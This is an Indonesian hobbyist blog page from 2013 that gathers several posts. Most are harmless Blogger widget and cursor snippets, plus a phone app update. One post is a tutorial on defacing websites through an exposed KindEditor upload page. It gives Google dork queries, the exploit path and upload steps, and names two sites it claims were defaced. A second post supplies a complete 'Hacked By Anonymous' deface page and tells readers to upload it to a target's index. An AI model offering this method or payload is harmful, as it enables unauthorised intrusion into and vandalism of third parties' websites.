Jumat, 30 Agustus 2013

Update X-plore 1.58 s60v3-5


Update X-plore 1.58 s60v3-5

Category: Aplikasi S60v3



Assalamu'alaikum

Gimna broo kabarnya??smile
Baik kan?.smile
Belum lama rasanya pihak Lonely cat games meluncurkan aplikasi file manager yg menurutku paling pas buat hp symbian ku...
apalagi kalau bukan x-plore versi 1.57

Nah,,sekarang sudah update lagi nih ke versi 1.58, tepatnya tanggal 18-04-2012 kemarin.


xpl.jpg


belum ketemu apa kelebihan lainnya dari versi sebelumnya... so'alnya baru pake jga smile
tpi rasanya gx jauh beda deh...baiknya kamu coba sendiri ya...
Yaudah,..yang berminat mau ngupdate x-plore nya atau cuma sekedar buat koleksi,,silahkan di comot

dwnld.gif


bye....
10.gif

Kamis, 29 Agustus 2013

Cara Deface Website Dengan Teknik Web KindEditor

Cara Deface Website Dengan Teknik Web KindEditor



Ok, Langsung aja kita mulai defacenya...

Masukan Dorknya ke kotak pencarian Google :
inurl:examples/uploadbutton.html
inurl:kindeditor
Exploit :
http://www.contohtarget.com/path/kindeditor/examples/uploadbutton.html

1. Kalo web target udah dapet, kita klik upload,



2. Kemudian pilih HTML defecan agan. Contoh disini kita menggunakan HTML ane... gustav4rt.html



3. Nanti akan keluar URL hasil upload-an HTML kita... copas link tersebut dan letakkan diakhir URL.



4. Kemudian kalo sudah, tekan Enter.

5. Taraaa... :D

Hasilnya :
www.daitianyi.net
www.staic.qefeng.com
Gimana, mudahkan? hehehe...
Semoga tutorial diatas tentang Cara Deface Website Dengan Teknik Web KindEditor bisa bermanfaat bagi agan-agan sekalian, kurang lebihnya saya mohon maaf, Wassalam.

Contoh Script Deface Typing


Script Deface html – Typing Text

Halo Sob gmna kbrnya? Moga2 sehat ya. Hari ni ane lg ga dpt ide bwt ngepost (emang ga bakat hehee…) Jadi iseng buat isi kekosongan ane post script sederhana bwt deface an aj y. Berikut ni adalah contoh script deface sederhana jenis typing text (tulisan mengetik sendiri).
Sobat2 nanti bisa tambah / kurang sendiri script sesuai keinginan. Wokee.. Copas aj kode berikut :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
<html><head>
<br>
</br>
<title>Hacked By Anonymous Indonesia </title>
<link rel="icon" href="none" type="image/x-icon" />
<link rel="shortcut icon" href="none" type="image/x-icon" />
<style type="text/css">
<!--
.ahgcrewstyle {
        color: #F00;
}
.ahg {
        color: #0F0;
}
#message font strong {
        font-family: Tahoma, Geneva, sans-serif;
        font-size: 18px;
}
.gre {
        color: #9F3;
        font-size: 36px;
}
#message font {
        font-size: 16px;
}
-->
</style>
</head><body alink="gray" bgcolor="black" vlink="gray" link="gray" text="gray">
<p></p><center>
<center></center>
<script type="text/javascript">
TypingText = function(element, interval, cursor, finishedCallback) {
  if((typeof document.getElementById == "undefined") || (typeof element.innerHTML == "undefined")) {
    this.running = true;
    return;
  }
  this.element = element;
  this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; });
  this.interval = (typeof interval == "undefined" ? 100 : interval);
  this.origText = this.element.innerHTML;
  this.unparsedOrigText = this.origText;
  this.cursor = (cursor ? cursor : "");
  this.currentText = "";
  this.currentChar = 0;
  this.element.typingText = this;
  if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++;
  TypingText.all.push(this);
  this.running = false;
  this.inTag = false;
  this.tagBuffer = "";
  this.inHTMLEntity = false;
  this.HTMLEntityBuffer = "";
}
TypingText.all = new Array();
TypingText.currentIndex = 0;
TypingText.runAll = function() {
  for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
}
TypingText.prototype.run = function() {
 if(this.running) return;
 if(typeof this.origText == "undefined") {
   setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
   return;
 }
 if(this.currentText == "") this.element.innerHTML = "";
 if(this.currentChar < this.origText.length) {
   if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) {
     this.tagBuffer = "<";
     this.inTag = true;
     this.currentChar++;
     this.run();
     return;
   } else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {
     this.tagBuffer += ">";
      this.inTag = false;
      this.currentText += this.tagBuffer;
      this.currentChar++;
      this.run();
      return;
    } else if(this.inTag) {
      this.tagBuffer += this.origText.charAt(this.currentChar);
      this.currentChar++;
      this.run();
      return;
    } else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) {
     this.HTMLEntityBuffer = "&";
      this.inHTMLEntity = true;
      this.currentChar++;
      this.run();
      return;
    } else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) {
     this.HTMLEntityBuffer += ";";
      this.inHTMLEntity = false;
      this.currentText += this.HTMLEntityBuffer;
      this.currentChar++;
      this.run();
      return;
    } else if(this.inHTMLEntity) {
      this.HTMLEntityBuffer += this.origText.charAt(this.currentChar);
      this.currentChar++;
      this.run();
      return;
    } else {
      this.currentText += this.origText.charAt(this.currentChar);
    }
    this.element.innerHTML = this.currentText;
    this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == "function" ? this.cursor(this.currentText) : this.cursor) : "");
   this.currentChar++;
   setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
 } else {
        this.currentText = "";
        this.currentChar = 0;
       this.running = false;
       this.finishedCallback();
 }
}
</script>
<center>
  <b class="Gre">Anonymous Indonesia</b>
  <br>
  <font>
</font><p id="message"><font> <strong><br> Hahahaa... Selamat datang di Contoh Script Deface No Face Berikutnya.. Ganti Text sesuai yang sobat2 inginkan, Sobat bebas tulis pesan panjang atau pendek dan masukan suara outoplay dari youtube, devine music, atau lain2...Wokee..<br>
 Atau mau tulis seperti dibawah ini...
<br>We Are Anonymous , We Are Legion , We Do Not Forget  , We Do Not Forgive , Expect Us !<br>
 <br>
 [ varis-uyeee.blogspot.com ]</strong><br>
<br>
[ Greetz : <span class="ahgcrewstyle"><strong><strong>  All Anonymous Hackers </strong></strong></span><strong> ] <br>
</font></p>
<p align="center"><em>Deface By</em>: <b><font size="3"><span class="ahgcrewstyle">Anonymous_Rez</span></font></b></p>
<p><font><br>
 <br>
 <p align="center"><font color="red" size="+1" face="Times New Roman"> <br>Dont Ever Touch Indonesian Sites Or You'll be Damned..!!<br>and<br>You Will Know Why We Hacked - #Operation PayBack<br>We See<br>We Judge<br></p>
<div class="fb-like-box" data-href="data-href="https://www.facebook.com/varis.rizki"" data-width="292" data-show-faces="false" data-stream="false" data-header="false"></div>
<div id="fb-root"></div>
<script>(function(d, s, id) {
 var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/en_US/all.js#xfbml=1&appId=384191914936497";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>
<p align="center"><font size="+8" face="Times New Roman"><font color="green">We <font color="white"> Are <font color="red"> Legion</p>
<script>alert('NoFace  Script  html - Click disini');</script>
  <script type="text/javascript">
new TypingText(document.getElementById("message"), 50, function(i){ var ar = new Array("\\", "|", "/", "-"); return " " + ar[i.length % ar.length]; });
//Type out examples:
TypingText.runAll();
  </script>
</font></p>
</center></center>
<br>
<div align="center"><img src="http://sarbaz-faz.persiangig.com/Hack/hacked.gif"></div>
</br>
</body></html>
<!-- aghaze larzeshe safhe-->
<meta http-equiv="Content-Language" content="en-us">
<SCRIPT language=JavaScript>
<!-- Begin
function shake(n) {
if (parent.moveBy) {
for (i = 10; i > 0; i--) {
for (j = n; j > 0; j--) {
parent.moveBy(-i,0);
parent.moveBy(0,-i);
parent.moveBy(-i,0);
parent.moveBy(0,i);
parent.moveBy(i,0);
parent.moveBy(0,-i);
parent.moveBy(-i,0);
parent.moveBy(0,i);
parent.moveBy(i,0);
parent.moveBy(0,-i);
parent.moveBy(-i,0);
parent.moveBy(0,-i);
parent.moveBy(i,0);
parent.moveBy(0,i);
parent.moveBy(i,0);
parent.moveBy(0,i);
        }
     }
  }
}
//  End -->
<!--
shake(1);
//-->
</SCRIPT>
<!-- p align="center"><font size="7" color="#FF0000">chi?</font></p> -->
<!--payan--></SCRIPT>
</body>
</html>
</body>
</html>
<P align=center></P>
<body bgcolor="#333366" background="http://iasstes-team.com/p_0001.jpg" text="#FFFFFF" link="#0066CC" vlink="#999999" alink="#993300" style="background-image: url('http://sarbaz-faz.persiangig.com/Hack/meshki.JPG')"><style>
body {
    padding:0;
    margin:0;
    background-image:url(http://iasstes-team.com/p_0001.jpg);
    background-repeat: no-repeat;
    background-position:top;
background-color: black;
color: white;
font: normal 80% Verdana;
margin-top: 0px;
margin-left: 0px;
padding: 0;
margin-right: 0px;
}
td{font-family: verdana; font-size: 20pt; color: green}
a{font-family: verdana; font-size: 20pt; color: silver}
</style>
<style>
#navbar-iframe {
display: none;
}
<style>

Kalo sudah paste ke notepad jangan lupa save dlm format html (contoh nama.html) – Type : All Files.
Jadi deh gampang kan? Nah sekarang tinggal upload ke index site tujuan anda heheee…
Sampai jumpa, Wasallam…

Sabtu, 24 Agustus 2013

Cara Hack Widget Flag Counter (Pengunjung Membanjiri Blog Anda)

Flag Countersekarang saya akan posting Cara hack widget Flag Counter, pasti bagi anda para blogger pasti sudah tidak asing lagi sama yang namanya Flagcounter ya itu adalah sebuat widget untuk melihat seberapa banya pengunjung & pageview kamu. tapi bagi kami yang masih pemula hanya 1 orang per hari itu adalah bencana. mengapa tidak seakan akan blog kalian tidak seru jadi sepi gitu kesan nya. nah di sini si alien bakal bagiin kekamu cara menghack widget Flag Counter !

caranya gampang kok !!!


Silahkan ikuti tutorial nya dibawah ini dengan hati-hati ..
^_^




1. Pertama anda pergi ke blog dan kemudian menuju ke "Tata Letak"
2. Kemudian "Tambah Gadget" dan pilih HTML/Javascript

3. Lalu block semua kode dibawah ini kemudian Copy & Paste :




~ Code ~
<center><a href="http://info.flagcounter.com/D88O"><img src="http://s07.flagcounter.com/count/D88O/bg_FFFFFF/txt_000000/border_CCCCCC/columns_3/maxflags_48
/viewers_0/labels_0/pageviews_1/flags_1/" alt="Flag Counter" border="0"></a></center>




4. Terakhir klik simpan dan lihat apa yang terjadi, Flag Counter anda akan bertambah drastiss ..
Demikian postingan Cara hack widget Flag Counter Dari Varis-uyeee, semoga bermanfaat. ^_^

Cara memasang Widget Kamera CCTV di Blog

Cara memasang Widget Kamera CCTV di Blog

Siap2

sebelum melakukan sesuatu Niat dulu!
Niatnya adalah sanggup!
Kalau gak sanggup?
SANGGUPIN :D

bismillah dulu..

Beli Rokok dulu biar gak paleng.Eet jgn lupa beli Kopi!

Cara memasangnya:
1. Login ke Blogger.
2. Masuk ke rancangan
3. Pilih elemen laman
4. klik Tambah Gadget
5. Pilih HTML/JavaScript

6. dan terakhir, copy script yg ada di abwah ini dan paste kan di HTML/JavaScript. Lalu simpan, dan lihat hasilnya.
<script language="JavaScript" src="http://js4you.googlecode.com/files/cctv.js" type="text/javascript"> </script> <script language="JavaScript" type="text/javascript"> cot("https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZ6d6MZleiO1dj0lM2h7INQetnBhlYcuDtyDF7ak-7fPtfE7RbpyRzi1RCUHCgFb438N7BTumxzvN82LlHBs7pKiQ3J2p16LmnwG3jMXPO_aXaMVPwvp7vTu59x8MfkGa8Z4ZjyAZaXSQ/s1600/cctv.gif")</script>

Cara Bikin Text Mengikuti Cursor

Siap2

sebelum melakukan sesuatu Niat dulu!
Niatnya adalah sanggup!
Kalau gak sanggup?
SANGGUPIN :D

1.bismillah dulu..

2.Beli Rokok dulu biar gak paleng!

Eet jgn lupa beli Kopi!

Login Ke Blogger Kamu



3.Klik Rancangan

4.
Klik Edit HTML

Tekan Ctrl + F pada browser kamu langsung keluar mesin pencari, lalu tulis "</head>"(tanpa kutip) di kolom browser Ctrl + F tadi..

5.Setelah Ketemu </head> copy script dibawah ini


<style type='text/css'>
#outerCircleText {
font-style: italic;
font-weight: bold;
font-family: 'comic sans ms', verdana, arial;
color: #BD3C28F;
position: absolute;top: 0;left: 0;z-index: 3000;cursor: default;}
#outerCircleText div {position: relative;}
#outerCircleText div div {position: absolute;top: 0;left: 0;text-align: center;}
</style>
<script type='text/javascript'>
//<![CDATA[
;(function(){
// Pesanmu di sini, bahasa sundanya yaitu "Pesan anjeun di dieu.." hehehe... (QUOTED STRING)
var msg = "
Anonymous_Rez";

// Set font's style size for calculating dimensions
// Set to number of desired pixels font size (decimal and negative numbers not allowed)
var size = 25;
// Set both to 1 for plain circle, set one of them to 2 for oval
// Other numbers & decimals can have interesting effects, keep these low (0 to 3)
var circleY = 0.75; var circleX = 2;
// The larger this divisor, the smaller the spaces between letters
// (decimals allowed, not negative numbers)
var letter_spacing = 5;
// The larger this multiplier, the bigger the circle/oval
// (decimals allowed, not negative numbers, some rounding is applied)
var diameter = 10;
// Rotation speed, set it negative if you want it to spin clockwise (decimals allowed)
var rotation = 0.4;
// This is not the rotation speed, its the reaction speed, keep low!
// Set this to 1 or a decimal less than one (decimals allowed, not negative numbers)
var speed = 0.3;
// BERHENTI NGEDITNYA..! Parantos cicing di dieu! Ulah diteraskeun..! //
if (!window.addEventListener && !window.attachEvent || !document.createElement) return;
msg = msg.split('');
var n = msg.length - 1, a = Math.round(size * diameter * 0.208333), currStep = 20,
ymouse = a * circleY + 20, xmouse = a * circleX + 20, y = [], x = [], Y = [], X = [],
o = document.createElement('div'), oi = document.createElement('div'),
b = document.compatMode && document.compatMode != "BackCompat"? document.documentElement :
document.body,
mouse = function(e){
e = e || window.event;
ymouse = !isNaN(e.pageY)? e.pageY : e.clientY; // y-position
xmouse = !isNaN(e.pageX)? e.pageX : e.clientX; // x-position
},
makecircle = function(){ // rotation/positioning
if(init.nopy){
o.style.top = (b || document.body).scrollTop + 'px';
o.style.left = (b || document.body).scrollLeft + 'px';
};
currStep -= rotation;
for (var d, i = n; i > -1; --i){ // makes the circle
d = document.getElementById('iemsg' + i).style;
d.top = Math.round(y[i] + a * Math.sin((currStep + i) / letter_spacing) * circleY - 15) +
'px';
d.left = Math.round(x[i] + a * Math.cos((currStep + i) / letter_spacing) * circleX) + 'px';
};
},
drag = function(){ // makes the resistance
y[0] = Y[0] += (ymouse - Y[0]) * speed;
x[0] = X[0] += (xmouse - 20 - X[0]) * speed;
for (var i = n; i > 0; --i){
y[i] = Y[i] += (y[i-1] - Y[i]) * speed;
x[i] = X[i] += (x[i-1] - X[i]) * speed;
};
makecircle();
},
init = function(){ // appends message divs, & sets initial values for positioning arrays
if(!isNaN(window.pageYOffset)){
ymouse += window.pageYOffset;
xmouse += window.pageXOffset;
} else init.nopy = true;
for (var d, i = n; i > -1; --i){
d = document.createElement('div'); d.id = 'iemsg' + i;
d.style.height = d.style.width = a + 'px';
d.appendChild(document.createTextNode(msg[i]));
oi.appendChild(d); y[i] = x[i] = Y[i] = X[i] = 0;
};
o.appendChild(oi); document.body.appendChild(o);
setInterval(drag, 25);
},
ascroll = function(){
ymouse += window.pageYOffset;
xmouse += window.pageXOffset;
window.removeEventListener('scroll', ascroll, false);
};
o.id = 'outerCircleText'; o.style.fontSize = size + 'px';
if (window.addEventListener){
window.addEventListener('load', init, false);
document.addEventListener('mouseover', mouse, false);
document.addEventListener('mousemove', mouse, false);
if (/Apple/.test(navigator.vendor))
window.addEventListener('scroll', ascroll, false);
}
else if (window.attachEvent){
window.attachEvent('onload', init);
document.attachEvent('onmousemove', mouse);
};
})();
//]]>
</script>

nah, text "Anonymous_Rez"nya ganti/edit jadi nama kamu atau terserah kamu..
paste Script ini diatas text </head>

alhamdulillah

Cara Bikin salam Pembuka Dan Penutup Pada Blog

Langsung saja!!
Login Ke Blogger Kamu

Klik Rancangan
 
Klik Edit HTML

Tekan Ctrl + F pada browser kamu langsung keluar mesin pencari, lalu tulis "</head>"(tanpa kutip) di kolom browser Ctrl + F tadi..

Setelah Ketemu </head> copy script dibawah ini



<script type='text/javascript'>
alert("www.varis-uyeee.blogspot.com!")
</script>

<script language='javascript' src='http://connect.facebook.net/en_US/all.js'/>


<script type='text/javascript'>
// goodbye alert
function goodbye(){
alert('Good Bye..!');
}
parent.window.onunload=goodbye;

</script>


paste Script ini diatas text </head>

Lalu Klik Simpan Template

Untuk mengganti namanya Hapus

www.varis-uyeee.blogspot.com!
Ganti sesuai Kalimat kalian!

Selamat Mencoba

Kumpulan widget animasi bergerak

Pojok-Pojok lagi lagi Kumpulan Widget Animasi Keren Di Blog buat di gambar pojok,Nah gan buat yang lagi cari Gambar atau Animasi Keren buat di blog silahkan di pilih Kumpulan Widget Animasi Keren Di Blog ini  Tapi saya ambil dari koleksi gambar animasi gerak saya gan . Cara pasangnya juga gampang ayo ke tkp

1.Masuk akun blogger kamu Klik > Rancangan > Pilih add laman  > dan pilih HTML/javascript 
2.Pilih salah satu gambar di bawah ini yang kamu suka kemudian kopi pastekan kode HTML nya di HTML/javascript .
3.Simpan dan lihat hasilnya 
gedeg
<div style="bottom: 0px; height: 160px; left: 10px; position: fixed; width: 130px;">
<a href="http://berbagi-html.blogspot.com/" target="_blank"><img alt="animasi  bergerak gif" border="0" src="http://i1082.photobucket.com/albums/j380/faris65/aLdo.gif" title="My widget" /></a><small></small>
<center>
<small><a href="http://berbagi-html.blogspot.com/2012/08/widget-animasi-keren-di-blog.html" target="_blank" title="Kumpulan Widget Animasi Keren Di Blog">My Widget</a></small></center>
</div>

nemo
<div style="bottom: 0px; height: 160px; left: 10px; position: fixed; width: 130px;">
<a href="http://berbagi-html.blogspot.com/" target="_blank"><img alt="animasi  bergerak gif" border="0" src="http://i1082.photobucket.com/albums/j380/faris65/SuRyD.gif" title="My widget" /></a><small></small>
<center>
<small><a href="http://berbagi-html.blogspot.com/2012/08/widget-animasi-keren-di-blog.html" target="_blank" title="Kumpulan Widget Animasi Keren Di Blog">My Widget</a></small></center>
</div>
joro
<div style="bottom: 0px; height: 160px; left: 10px; position: fixed; width: 130px;">
<a href="http://berbagi-html.blogspot.com/" target="_blank"><img alt="animasi  bergerak gif" border="0" src="http://i1082.photobucket.com/albums/j380/faris65/zoroattack.gif" title="My widget" /></a><small></small>
<center>
<small><a href="http://berbagi-html.blogspot.com/2012/08/widget-animasi-keren-di-blog.html" target="_blank" title="Kumpulan Widget Animasi Keren Di Blog">My Widget</a></small></center>
</div>
barongsai
<div style="bottom: 0px; height: 160px; left: 10px; position: fixed; width: 130px;">
<a href="http://berbagi-html.blogspot.com/" target="_blank"><img alt="animasi  bergerak gif" border="0" src="http://i1082.photobucket.com/albums/j380/faris65/Barongsai-1.gif" title="My widget" /></a><small></small>
<center>
<small><a href="http://berbagi-html.blogspot.com/2012/08/widget-animasi-keren-di-blog.html" target="_blank" title="Kumpulan Widget Animasi Keren Di Blog">My Widget</a></small></center>
</div>
berubah
<div style="bottom: 0px; height: 160px; left: 10px; position: fixed; width: 130px;">
<a href="http://berbagi-html.blogspot.com/" target="_blank"><img alt="animasi  bergerak gif" border="0" src="http://i1082.photobucket.com/albums/j380/faris65/berubah.gif" title="My widget" /></a><small></small>
<center>
<small><a href="http://berbagi-html.blogspot.com/2012/08/widget-animasi-keren-di-blog.html" target="_blank" title="Kumpulan Widget Animasi Keren Di Blog">My Widget</a></small></center>
</div>


<div style="bottom: 0px; height: 160px; left: 10px; position: fixed; width: 130px;">
<a href="http://berbagi-html.blogspot.com/" target="_blank"><img alt="animasi  bergerak gif" border="0" src="http://i1082.photobucket.com/albums/j380/faris65/dandan.gif" title="My widget" /></a><small></small>
<center>
<small><a href="http://berbagi-html.blogspot.com/2012/08/widget-animasi-keren-di-blog.html" target="_blank" title="Kumpulan Widget Animasi Keren Di Blog">My Widget</a></small></center>
</div>


<div style="bottom: 0px; height: 160px; left: 10px; position: fixed; width: 130px;">
<a href="http://berbagi-html.blogspot.com/" target="_blank"><img alt="animasi  bergerak gif" border="0" src="http://i1082.photobucket.com/albums/j380/faris65/Dup3ngupil.gif" title="My widget" /></a><small></small>
<center>
<small><a href="http://berbagi-html.blogspot.com/2012/08/widget-animasi-keren-di-blog.html" target="_blank" title="Kumpulan Widget Animasi Keren Di Blog">My Widget</a></small></center>
</div>


<div style="bottom: 0px; height: 160px; left: 10px; position: fixed; width: 130px;">
<a href="http://berbagi-html.blogspot.com/" target="_blank"><img alt="animasi  bergerak gif" border="0" src="http://i1082.photobucket.com/albums/j380/faris65/ganteng.gif" title="My widget" /></a><small></small>
<center>
<small><a href="http://berbagi-html.blogspot.com/2012/08/widget-animasi-keren-di-blog.html" target="_blank" title="Kumpulan Widget Animasi Keren Di Blog">My Widget</a></small></center>
</div>



<div style="bottom: 0px; height: 160px; left: 10px; position: fixed; width: 130px;">
<a href="http://berbagi-html.blogspot.com/" target="_blank"><img alt="animasi  bergerak gif" border="0" src="http://i1082.photobucket.com/albums/j380/faris65/hehe.gif" title="My widget" /></a><small></small>
<center>
<small><a href="http://berbagi-html.blogspot.com/2012/08/widget-animasi-keren-di-blog.html" target="_blank" title="Kumpulan Widget Animasi Keren Di Blog">My Widget</a></small></center>
</div>



<div style="bottom: 0px; height: 160px; left: 10px; position: fixed; width: 130px;">
<a href="http://berbagi-html.blogspot.com/" target="_blank"><img alt="animasi  bergerak gif" border="0" src="http://i1082.photobucket.com/albums/j380/faris65/hiks1.gif" title="My widget" /></a><small></small>
<center>
<small><a href="http://berbagi-html.blogspot.com/2012/08/widget-animasi-keren-di-blog.html" target="_blank" title="Kumpulan Widget Animasi Keren Di Blog">My Widget</a></small></center>
</div>



<div style="bottom: 0px; height: 160px; left: 10px; position: fixed; width: 130px;">
<a href="http://berbagi-html.blogspot.com/" target="_blank"><img alt="animasi  bergerak gif" border="0" src="http://i1082.photobucket.com/albums/j380/faris65/hore.gif" title="My widget" /></a><small></small>
<center>
<small><a href="http://berbagi-html.blogspot.com/2012/08/widget-animasi-keren-di-blog.html" target="_blank" title="Kumpulan Widget Animasi Keren Di Blog">My Widget</a></small></center>
</div>

hujan

<div style="bottom: 0px; height: 160px; left: 10px; position: fixed; width: 130px;">
<a href="http://berbagi-html.blogspot.com/" target="_blank"><img alt="animasi  bergerak gif" border="0" src="http://i1082.photobucket.com/albums/j380/faris65/hujan.gif" title="My widget" /></a><small></small>
<center>

<small><a href="http://berbagi-html.blogspot.com/2012/08/widget-animasi-keren-di-blog.html" target="_blank" title="Kumpulan Widget Animasi Keren Di Blog">My Widget</a></small></center>
</div>
unyu-unyu

<div style="bottom: 0px; height: 160px; left: 10px; position: fixed; width: 130px;">
<a href="http://berbagi-html.blogspot.com/" target="_blank"><img alt="animasi  bergerak gif" border="0" src="http://i1082.photobucket.com/albums/j380/faris65/huuuuuu.gif" title="My widget" /></a><small></small>
<center>
<small><a href="http://berbagi-html.blogspot.com/2012/08/widget-animasi-keren-di-blog.html" target="_blank" title="Kumpulan Widget Animasi Keren Di Blog">My Widget</a></small></center>
</div>



<div style="bottom: 0px; height: 160px; left: 10px; position: fixed; width: 130px;">
<a href="http://berbagi-html.blogspot.com/" target="_blank"><img alt="animasi  bergerak gif" border="0" src="http://i1082.photobucket.com/albums/j380/faris65/jedug.gif" title="My widget" /></a><small></small>
<center>
<small><a href="http://berbagi-html.blogspot.com/2012/08/widget-animasi-keren-di-blog.html" target="_blank" title="Kumpulan Widget Animasi Keren Di Blog">My Widget</a></small></center>
</div>

Widget animasi
kembik2


<div style="bottom: 0px; height: 160px; left: 10px; position: fixed; width: 130px;">
<a href="http://berbagi-html.blogspot.com/" target="_blank"><img alt="animasi  bergerak gif" border="0" src="http://i1082.photobucket.com/albums/j380/faris65/kembik2.gif" title="My widget" /></a><small></small>
<center>
<small><a href="http://berbagi-html.blogspot.com/2012/08/widget-animasi-keren-di-blog.html" target="_blank" title="Kumpulan Widget Animasi Keren Di Blog">My Widget</a></small></center>
</div>

Jumat, 23 Agustus 2013

Cara Mengganti Kursor Blogger-Modifikasi Cursor Blogspot + Foto MEME!

Cara Mengganti Kursor Blogger-Modifikasi Cursor Blogspot

Cara Mengganti Kursor Blogger - Modifikasi Cursor Blogspot. Kali ini kita akan membahas tentang cara mengubah tampilan kursor yang ada di blog kita. Jika sobat masih penasaran dengan yang dimaksud mengubah kursur, maka silahkan untuk memperhatikan kursor blog ini terlebih dahulu. Bagaimana? Menarik bukan....?
cara ganti tampilan kursor
Nah, di atas itu adalah tampilan kursor blog ini. Bagi sobat yang ingin mengubah kursor yang ada di blog sobat, maka sobat bisa mengubahnya melalui langkah-langkah berikut:

1. login lah ke akun blogger sobat terlebih dahulu
2. Lalu klik "Layout"
cara ganti tampilan kursor

 3. Pilih "add a gadget" lalu pilih "HTML/Java Script" dan paste-kan kode berikut untuk mulai mengubah tampilan kursor yang ada di blog sobat:

a. Kode 1: mengubah kursor tapi tidak mengubah kursor ketika menyorot link

<style type="text/css">
body{cursor: url("https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpz-NBtokRdM76nx5_aHuE1qgwosESmej2OTuRntdQKsTO3DBvtrAqj4WdabTUpkUedha0xaekzhvaisggFHHtR2kH4v32FEQ-RdPTuBMBl7YSxYfC_bIEswREFzzhNu69Q5pfovnUW2lL/"), auto;}
</style>

b. Kode 2: mengubah kursor serta tetap berubah walau disorot ke arah link

<style type="text/css">
body{cursor: url("https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpz-NBtokRdM76nx5_aHuE1qgwosESmej2OTuRntdQKsTO3DBvtrAqj4WdabTUpkUedha0xaekzhvaisggFHHtR2kH4v32FEQ-RdPTuBMBl7YSxYfC_bIEswREFzzhNu69Q5pfovnUW2lL/"), auto;}
body a:hover{cursor: url("https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpz-NBtokRdM76nx5_aHuE1qgwosESmej2OTuRntdQKsTO3DBvtrAqj4WdabTUpkUedha0xaekzhvaisggFHHtR2kH4v32FEQ-RdPTuBMBl7YSxYfC_bIEswREFzzhNu69Q5pfovnUW2lL/"), auto;}
</style>

SILAHKAN UNTUK MEMILIH SALAH SATU KODE YANG SOBAT INGINKAN

4. Jika sudah, maka silahkan untuk tekan tombol "SAVE" atau "SIMPAN"


Ni Gan ane kasih Bonus yg pengen kursor MEME!

 


Format Png 
http://www.rw-designer.com/cursor-view/37887.png Are You Fucking Kidding Me?
Link :http://www.rw-designer.com/cursor-view/37887.png
http://www.rw-designer.com/cursor-view/37888.pngBitch Please
Link : http://www.rw-designer.com/cursor-view/37888.png
http://www.rw-designer.com/cursor-view/37889.pngDerp
Link : http://www.rw-designer.com/cursor-view/37889.png
http://www.rw-designer.com/cursor-view/37890.pngDerp Crying
Link : http://www.rw-designer.com/cursor-view/37890.png
http://www.rw-designer.com/cursor-view/37891.pngDerp Happy
Link : http://www.rw-designer.com/cursor-view/37891.png

http://www.rw-designer.com/cursor-view/37892.pngDerphina
Link : http://www.rw-designer.com/cursor-view/37892.png
http://www.rw-designer.com/cursor-view/37893.pngForever Alone
Link : http://www.rw-designer.com/cursor-view/37893.png
http://www.rw-designer.com/cursor-view/37894.pngFuck yeah
Link : http://www.rw-designer.com/cursor-view/37894.png
http://www.rw-designer.com/cursor-view/37895.pngFuuuuuuuuu
Link : http://www.rw-designer.com/cursor-view/37895.png
http://www.rw-designer.com/cursor-view/37896.pngLOL
Link : http://www.rw-designer.com/cursor-view/37896.png
http://www.rw-designer.com/cursor-view/37897.pngMe Gusta
Link : http://www.rw-designer.com/cursor-view/37897.png
http://www.rw-designer.com/cursor-view/37898.pngOkay
Link : http://www.rw-designer.com/cursor-view/37898.png
http://www.rw-designer.com/cursor-view/37899.pngPoker Face
Link : http://www.rw-designer.com/cursor-view/37899.png
http://www.rw-designer.com/cursor-view/38004.pngTroll face
Link : http://www.rw-designer.com/cursor-view/38004.png
http://www.rw-designer.com/cursor-view/37900.pngSerious
Link : http://www.rw-designer.com/cursor-view/37900.png

Format Gif

http://www.rw-designer.com/cursor-view/39752.pngHahahaha Troll
Link : http://www.rw-designer.com/cursor-view/39752.png
http://www.rw-designer.com/cursor-view/39746.pngWaiting Troll
Link : http://www.rw-designer.com/cursor-view/39746.png
http://www.rw-designer.com/cursor-view/39756.pngText Sellect Troll
Link : http://www.rw-designer.com/cursor-view/39756.png
http://www.rw-designer.com/cursor-view/39745.pngTroll Face Click here

Link : http://www.rw-designer.com/cursor-view/39745.png